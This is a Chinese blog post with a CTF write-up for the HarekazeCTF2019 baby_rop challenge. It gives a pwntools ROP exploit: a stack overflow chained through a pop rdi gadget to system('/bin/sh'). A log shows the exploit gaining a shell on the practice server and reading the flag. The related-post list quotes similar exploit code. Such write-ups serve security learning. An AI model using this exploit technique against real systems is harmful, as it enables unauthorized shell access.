CTF buuoj pwn-----[HarekazeCTF2019]baby_rop

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: PWN 文章标签: linux 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bing_Max/article/details/120702944
版权

[HarekazeCTF2019]baby_rop

1. 分析

shift+f12 ,有system 有bin/sh ,64位,直接调用system就行
果真babyrop
在这里插入图片描述

2. 编写exp

from pwn import *

sh = remote('node4.buuoj.cn', 26517)  

bin_sh_addr = 0x601048
system_addr = 0x400490
pop_rdi_addr = 0x400683

payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
sh.sendline(payload)
sh.interactive()

3. 运行exp,获取flag

flag 不在根目录下,find 查找到z在./home/babyrop/flag

bing@bing-virtual-machine:~$ python3 ./[HarekazeCTF2019]baby_rop.py
[+] Opening connection to node4.buuoj.cn on port 26517: Done
[*] Switching to interactive mode
What's your name?
$ find -name flag
./home/babyrop/flag
find: './proc/tty/driver': Permission denied
find: './proc/1/task/1/fd': Permission denied
find: './proc/1/task/1/fdinfo': Permission denied
find: './proc/1/task/1/ns': Permission denied
find: './proc/1/fd': Permission denied
find: './proc/1/map_files': Permission denied
find: './proc/1/fdinfo': Permission denied
find: './proc/1/ns': Permission denied
find: './proc/7/task/7/fd': Permission denied
find: './proc/7/task/7/fdinfo': Permission denied
find: './proc/7/task/7/ns': Permission denied
find: './proc/7/fd': Permission denied
find: './proc/7/map_files': Permission denied
find: './proc/7/fdinfo': Permission denied
find: './proc/7/ns': Permission denied
find: './root': Permission denied

$ cat ./home/babyrop/flag
flag{60b6bc83-bfa5-463a-9bd4-05b9261703d9}

flag{60b6bc83-bfa5-463a-9bd4-05b9261703d9}

Hex_bing
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2563
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 417
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
[HarekazeCTF2019]baby_rop
m0sway的博客
03-26 550
[HarekazeCTF2019]baby_rop WriteUp BUU_PWN
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 286
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
BUUCTF [HarekazeCTF2019]baby_rop
小白垃圾笔记2
05-13 189
不过因为这是64位程序,所以我们需要找一些东西的地址。main函数里直接是漏洞 ,第6行存在栈溢出。/bin/sh (当作system的参数)小白做题垃圾笔记,不建议阅读。system(调用系统函数·)pop rdi (用来传参)一次打不通可以多打几次。ret(用来栈对齐)
[HarekazeCTF2019]baby_rop wp (python3)
Kata_Jhin的博客
03-08 173
[HarekazeCTF2019]baby_rop wp (python3)
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 1410
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop
BangSen1的博客
03-29 274
例行检查,64位,开启NX保护。 运行一下 用IDA打开。shift+f12检索字符串,看到了system和/bin/sh shelladdr=0x601048 systemaddr=0x400496 查看主函数,v4的输入没有长度限制 ,可以造成溢出,由于程序 是64位的,所以传参会用到寄存器 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时,后面的依次从 “右向左” 放入栈中。 找到rdi的位置。 rdiaddr=0x
buuctf27 [HarekazeCTF2019]baby_rop2 1
weixin_74861133的博客
11-20 151
只开启了NX保护。
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 319
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
mcmuyanga的博客
09-01 685
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop 附件 步骤: 例行检查,64位,开启了NX保护 试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错 64位ida载入,shift+f12查看程序里的字符串,看到了system 和 ‘/bin/sh’ 双击跟进,ctrl+x查看一下哪里调用了字符串,没有找到函数,只找到了地址 shell=0x601048 system=0x400496 找到输入点,没有限制v4读入的数据,可以造成溢出,跟pwn16差不
[CTF]BUUCTF-PWN-[HarekazeCTF2019]baby_rop1
weixin_53394081的博客
04-12 156
[CTF]BUUCTF-PWN-[HarekazeCTF2019]baby_rop1
HarekazeCTF2019_baby_rop
z1r0的博客
12-04 703
HarekazeCTF2019_baby_rop 查看保护 溢出,有system和bin,rop就行 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25987) else: r = process(file_name) elf = ELF(file

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值